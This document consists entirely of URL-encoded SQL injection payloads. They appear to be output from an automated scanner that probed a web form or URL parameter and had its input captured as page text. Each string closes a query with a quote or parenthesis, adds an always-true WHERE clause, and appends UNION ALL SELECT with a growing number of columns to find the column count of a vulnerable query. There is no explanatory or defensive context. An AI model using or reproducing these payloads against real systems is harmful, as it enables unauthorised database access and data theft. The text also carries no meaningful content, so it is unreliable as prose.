-9933%27%29%20WHERE%205600%3D5600%20UNION%20ALL%20SELECT%205600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%2C5600%23 -5952%27%29%20WHERE%207916%3D7916%20UNION%20ALL%20SELECT%207916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%2C7916%23 -6061%27%29%20WHERE%203177%3D3177%20UNION%20ALL%20SELECT%203177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%2C3177%23 -1447%27%29%20WHERE%209543%3D9543%20UNION%20ALL%20SELECT%209543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%23 -2393%27%29%20WHERE%201320%3D1320%20UNION%20ALL%20SELECT%201320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%2C1320%23 -1109%27%29%20WHERE%203598%3D3598%20UNION%20ALL%20SELECT%203598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%2C3598%23 -1426%27%29%20WHERE%201239%3D1239%20UNION%20ALL%20SELECT%201239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%2C1239%23 -6348%27%29%20WHERE%206973%3D6973%20UNION%20ALL%20SELECT%206973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%2C6973%23 -4130%27%29%20WHERE%208469%3D8469%20UNION%20ALL%20SELECT%208469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%2C8469%23 -3853%27%29%20WHERE%203961%3D3961%20UNION%20ALL%20SELECT%203961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%2C3961%23 -5764%22%29%20WHERE%207257%3D7257%20UNION%20ALL%20SELECT%207257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%2C7257%23 -8754%22%29%20WHERE%205712%3D5712%20UNION%20ALL%20SELECT%205712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%2C5712%23 -7597%22%29%20WHERE%201161%3D1161%20UNION%20ALL%20SELECT%201161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%2C1161%23 -4056%22%29%20WHERE%205456%3D5456%20UNION%20ALL%20SELECT%205456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%2C5456%23 -4989%22%29%20WHERE%205346%3D5346%20UNION%20ALL%20SELECT%205346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%2C5346%23 -3327%22%29%20WHERE%206158%3D6158%20UNION%20ALL%20SELECT%206158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%2C6158%23 -1566%22%29%20WHERE%207630%3D7630%20UNION%20ALL%20SELECT%207630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%2C7630%23 -4109%22%29%20WHERE%203639%3D3639%20UNION%20ALL%20SELECT%203639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%2C3639%23 -7362%22%29%20WHERE%204598%3D4598%20UNION%20ALL%20SELECT%204598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%2C4598%23 -7364%22%29%20WHERE%201927%3D1927%20UNION%20ALL%20SELECT%201927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%2C1927%23 -5235%29%20WHERE%205963%3D5963%20UNION%20ALL%20SELECT%205963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%2C5963%23 -3760%29%20WHERE%203416%3D3416%20UNION%20ALL%20SELECT%203416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%2C3416%23 -7897%29%20WHERE%204836%3D4836%20UNION%20ALL%20SELECT%204836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%2C4836%23 -9219%29%20WHERE%207287%3D7287%20UNION%20ALL%20SELECT%207287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%2C7287%23 -8069%29%20WHERE%205266%3D5266%20UNION%20ALL%20SELECT%205266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%2C5266%23 -1637%29%20WHERE%209622%3D9622%20UNION%20ALL%20SELECT%209622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%2C9622%23 -2480%29%20WHERE%202314%3D2314%20UNION%20ALL%20SELECT%202314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%2C2314%23 -1942%29%20WHERE%209231%3D9231%20UNION%20ALL%20SELECT%209231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%2C9231%23 -3003%29%20WHERE%208829%3D8829%20UNION%20ALL%20SELECT%208829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%2C8829%23 -8780%29%20WHERE%201884%3D1884%20UNION%20ALL%20SELECT%201884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%2C1884%23 -8550%27%20WHERE%204888%3D4888%20UNION%20ALL%20SELECT%204888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%2C4888%23 -3033%27%20WHERE%209364%3D9364%20UNION%20ALL%20SELECT%209364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%2C9364%23 -2108%27%20WHERE%202351%3D2351%20UNION%20ALL%20SELECT%202351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%2C2351%23 -6412%27%20WHERE%206291%3D6291%20UNION%20ALL%20SELECT%206291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%23 -1944%27%20WHERE%208516%3D8516%20UNION%20ALL%20SELECT%208516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%2C8516%23 -6474%27%20WHERE%201861%3D1861%20UNION%20ALL%20SELECT%201861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%2C1861%23 -7685%27%20WHERE%202567%3D2567%20UNION%20ALL%20SELECT%202567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%2C2567%23 -9151%27%20WHERE%206302%3D6302%20UNION%20ALL%20SELECT%206302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%2C6302%23 -9565%27%20WHERE%208292%3D8292%20UNION%20ALL%20SELECT%208292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%2C8292%23 -4935%27%20WHERE%206033%3D6033%20UNION%20ALL%20SELECT%206033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%2C6033%23 -7366%22%20WHERE%207701%3D7701%20UNION%20ALL%20SELECT%207701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%2C7701%23 -7775%22%20WHERE%208418%3D8418%20UNION%20ALL%20SELECT%208418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%2C8418%23 -2074%22%20WHERE%205519%3D5519%20UNION%20ALL%20SELECT%205519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%2C5519%23 -1538%22%20WHERE%208114%3D8114%20UNION%20ALL%20SELECT%208114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%2C8114%23 -9147%22%20WHERE%201274%3D1274%20UNION%20ALL%20SELECT%201274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%2C1274%23 -3215%22%20WHERE%209703%3D9703%20UNION%20ALL%20SELECT%209703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%2C9703%23 -9661%22%20WHERE%201889%3D1889%20UNION%20ALL%20SELECT%201889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%2C1889%23 -2738%22%20WHERE%205846%3D5846%20UNION%20ALL%20SELECT%205846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%23 -8402%22%20WHERE%204712%3D4712%20UNION%20ALL%20SELECT%204712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%2C4712%23 -2125%22%20WHERE%209127%3D9127%20UNION%20ALL%20SELECT%209127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%2C9127%23 -3216%20WHERE%207925%3D7925%20UNION%20ALL%20SELECT%207925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%2C7925%23 -1253%20WHERE%206287%3D6287%20UNION%20ALL%20SELECT%206287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%2C6287%23 -8987%20WHERE%206540%3D6540%20UNION%20ALL%20SELECT%206540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%2C6540%23 -3530%20WHERE%204092%3D4092%20UNION%20ALL%20SELECT%204092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%2C4092%23 -1807%20WHERE%204864%3D4864%20UNION%20ALL%20SELECT%204864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%2C4864%23 -5461%20WHERE%208463%3D8463%20UNION%20ALL%20SELECT%208463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%2C8463%23 -6228%20WHERE%209810%3D9810%20UNION%20ALL%20SELECT%209810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%2C9810%23 